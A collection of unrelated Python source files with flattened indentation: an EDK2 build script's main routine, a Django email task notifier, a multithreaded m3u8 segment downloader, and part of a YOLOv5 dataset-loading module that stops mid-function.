# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose != None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet != None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug != None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile != None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" %(' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" %(' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile != None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile != None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag != None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
MyBuild.Launch()
# Drop temp tables to avoid database locked.
for TmpTableName in TmpTableDict:
SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
TmpTableDict[TmpTableName].execute(SqlCommand)
#MyBuild.DumpBuildData()
except FatalError, X:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning, X:
# error from Fdf parser
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError = False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb != None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.sourceforge.net for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
Conclusion = "Done"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)"%(BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild != None:
MyBuild.BuildReport.GenerateReport(BuildDurationStr)
MyBuild.Db.Close()
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
task_notifier.py
|
import sys, datetime, threading, json
from django.utils import timezone
from django.conf import settings
from django.core.mail import send_mail
from django.template import loader
import requests
def send_email_via_trustifi(subject, html_body, recipient):
payload = {
"recipients": [
{
"email": recipient
}
],
"title": subject,
"html": html_body,
}
headers = {
'x-trustifi-key': settings.TRUSTIFI_KEY,
'x-trustifi-secret': settings.TRUSTIFI_SECRET,
'Content-Type': 'application/json'
}
response = requests.request('POST', 'https://be.trustifi.com/api/i/v1/email', headers = headers, data = json.dumps(payload))
print(response.json())
def send_task_notifications(Task):
domain = settings.BASE_URL
for task in Task.objects.filter(notified=False, due_date__lte=timezone.now()):
url = f"{domain}{task.get_absolute_url()}"
subject = f'منظام - حان آوان مهمتك "{task.name}"'  # Arabic subject, roughly: '<app name> - it is time for your task "{task.name}"'
context = {'task_name': task.name, 'task_url': url}
text_body = loader.render_to_string('task_notification_body.txt', context)
html_body = loader.render_to_string('task_notification_body.html', context)
recipient = task.user.email
print(f'- sending email to "{task.user.email}" about task "{task.name}"')
if settings.USE_TRUSTIFI:
send_email_via_trustifi(subject, html_body, recipient)
else:
send_mail(subject, text_body, None, [recipient], fail_silently=False, html_message=html_body)
task.notified = True
task.save()
def run_task_notifier():
from .models import Task
exit = threading.Event()
def notify():
while True:
s = exit.wait(60)
if s:
break
exit.clear()
print(f"{datetime.datetime.now()}: sending task notifications", file=sys.stderr)
send_task_notifications(Task)
threading.Thread(target=notify).start()
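# --- Illustrative sketch, not part of the original module ---
# run_task_notifier() above keeps its exit Event local, so the notification
# loop cannot be stopped from outside.  One possible variant (an assumption,
# not something this project provides) returns the Event so callers can shut
# the notifier down cleanly:
def run_stoppable_task_notifier(interval_seconds=60):
    from .models import Task
    stop = threading.Event()
    def notify():
        # wait() returns True once stop.set() is called, ending the loop
        while not stop.wait(interval_seconds):
            send_task_notifications(Task)
    threading.Thread(target=notify, daemon=True).start()
    return stop  # call stop.set() to terminate the notifier
# ----------------------------------------------------------------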
|
__init__.py
|
# a multithreaded m3u8 download module; the number of threads can be chosen by the caller
# author: walkureHHH
# last modified: 2020/06/17
import requests
from threading import Thread
from threading import Lock
import os
import shutil
from tqdm import tqdm
class thread_num_ERROR(Exception):
pass
class mod_ERROR(Exception):
pass
class m3u8_downloader:
temp_file_path = ''
mp4_path = ''
num_of_threads = ''
m3u8_file_path = ''
urls = []
names = []
has_download_name = []
cant_dow = []
total = 0
lock = Lock()
def __init__(self,m3u8_file_path,temp_file_path='.',mp4_path='./test.mp4',num_of_threads=10):
if num_of_threads <= 0:
raise thread_num_ERROR('the number of threads must be at least 1')
self.mp4_path = mp4_path
self.temp_file_path = temp_file_path
self.num_of_threads = num_of_threads
self.m3u8_file_path = m3u8_file_path
if os.path.exists(self.temp_file_path+'/TS'):
print("""warning: the temporary folder has exited\n
please comfirm the temporary folder included the fragment video you need""")
self.has_download_name = os.listdir(self.temp_file_path+'/TS')
else:
os.mkdir(self.temp_file_path+'/TS')
self.has_download_name = []
with open(self.m3u8_file_path,'r') as m3u8:
temp_url = [m3u8_lines.replace('\n','') for m3u8_lines in m3u8.readlines() if m3u8_lines.startswith('http')]
self.total = len(temp_url)
self.names = [i.split('/')[-1].split('?')[0] for i in temp_url]
self.urls = [[] for j in range(0, self.num_of_threads)]
for index, el in enumerate(temp_url):
self.urls[index%self.num_of_threads].append(el)
return
def start(self,mod = 0, time_out = 60):
if mod not in [0,1,2,3]:
raise mod_ERROR('mod must be one of 0, 1, 2 or 3')
with tqdm(total=self.total,bar_format='<<*>> {percentage:3.0f}% {n_fmt}/{total_fmt} [{elapsed}<{remaining}] <<*>> ') as jdt:
Threads = []
for i in range(self.num_of_threads):
thread = Thread(target=self.__download, args=(self.urls[i],'thread'+str(i),jdt,time_out))
Threads.append(thread)
for threads in Threads:
threads.start()
for threads in Threads:
threads.join()
percent = '%.02f%%'%((len(self.has_download_name)/len(self.names))*100)
if len(self.has_download_name)==len(self.names):
print('download finished', percent)
for names in self.names:
ts = open(self.temp_file_path+'/TS/'+names,'rb')
with open(self.mp4_path,'ab') as mp4:
mp4.write(ts.read())
ts.close()
if mod == 0 or mod == 1:
os.remove(self.m3u8_file_path)
if mod == 0 or mod == 2:
shutil.rmtree(self.temp_file_path+'/TS')
else:
print('----------------------------------------------------------------')
for cantdow_urls in self.cant_dow:
print('download failed:', cantdow_urls)
print('download incomplete', percent)
def __download(self, download_list, thread_name, jdt, time_out):
for urls in download_list:
if urls.split('/')[-1].split('?')[0] not in self.has_download_name:
for i in range(0,5):
try:
conn = requests.get(urls,timeout=time_out)
if conn.status_code == 200:
with open(self.temp_file_path+'/TS/'+urls.split('/')[-1].split('?')[0],'wb') as ts:
ts.write(conn.content)
with self.lock:
if i != 0:
print('\n'+thread_name,'redownloaded successfully',urls.split('/')[-1].split('?')[0])
self.has_download_name.append(urls.split('/')[-1].split('?')[0])
jdt.update(1)
break
else:
with self.lock:
if i == 0:
print('\n'+thread_name,conn.status_code,urls.split('/')[-1].split('?')[0],'begin retry 1/4')
else:
print('\n'+thread_name,conn.status_code,urls.split('/')[-1].split('?')[0],'Retry '+ str(i) +'/4')
if i == 4:
self.cant_dow.append(urls)
except:
with self.lock:
if i == 0:
print('\n'+thread_name,'Time out ERROR',urls.split('/')[-1].split('?')[0],'begin retry 1/4')
else:
print('\n'+thread_name,'Time out ERROR',urls.split('/')[-1].split('?')[0],'Retry '+ str(i) +'/4')
if i == 4:
self.cant_dow.append(urls)
else:
with self.lock:
jdt.update(1)
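# --- Illustrative note, not part of the original module ---
# __init__ above distributes the segment URLs round-robin over the worker
# threads via `self.urls[index%self.num_of_threads].append(el)`.  For example,
# with num_of_threads = 3 and six URLs u0..u5 the per-thread buckets become
#     thread0 -> [u0, u3]
#     thread1 -> [u1, u4]
#     thread2 -> [u2, u5]
# so each thread downloads roughly the same number of fragments.
# ----------------------------------------------------------------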
if __name__ == "__main__":
a = m3u8_downloader('/mnt/c/Users/kylis/Downloads/r.m3u8',temp_file_path='.',mp4_path='./1.mp4', num_of_threads=17)
a.start()
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from modules.targetAcquisition.pylonDetection.utils.general import xyxy2xywh, xywh2xyxy, clean_str
from modules.targetAcquisition.pylonDetection.utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False):
# Make sure only the first process in DDP processes the dataset first, so that the following ones can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank,
image_weights=image_weights)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset properties will update during training, else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
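# --- Illustrative sketch, not part of the original module ---
# InfiniteDataLoader above re-iterates a repeated batch sampler so that its
# worker processes are kept alive across epochs, while __len__ still reports
# one epoch's worth of batches.  A minimal usage sketch (the toy dataset,
# batch size and worker count are invented for illustration):
#
#     ds = torch.utils.data.TensorDataset(torch.arange(16).float())
#     dl = InfiniteDataLoader(ds, batch_size=4, num_workers=2)
#     for epoch in range(3):
#         for (batch,) in dl:   # same worker processes reused every epoch
#             pass
# ----------------------------------------------------------------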
class LoadImages: # for inference
def __init__(self, path, img_size=640, auto=True):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size, auto=self.auto)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, auto=True):
self.mode = 'stream'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size, auto=self.auto)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
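# Illustrative example (not from the original source): on a POSIX path,
#   img2label_paths(['data/images/train/img1.jpg'])
# returns ['data/labels/train/img1.txt'], i.e. the first '/images/' segment is swapped
# for '/labels/' and the image suffix for '.txt'.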
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
assert self.img_files, 'No images found'
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = Path(self.label_files[0]).parent.with_suffix('.cache') # cached labels
if cache_path.is_file():
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'results' not in cache: # changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Display cache
[nf, nm, ne, nc, n] = cache.pop('results') # found, missing, empty, corrupted, total
desc = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=desc, total=n, initial=n)
assert nf > 0 or not augment, f'No labels found in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path=Path('./labels.cache')):
# Cache dataset labels, check images and read shapes
x = {} # dict
        nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, corrupted
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape]
except Exception as e:
nc += 1
print('WARNING: Ignoring corrupted image and/or label %s: %s' % (im_file, e))
pbar.desc = f"Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = [nf, nm, ne, nc, i + 1]
torch.save(x, path) # save for next time
logging.info(f"New cache created: {path}")
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
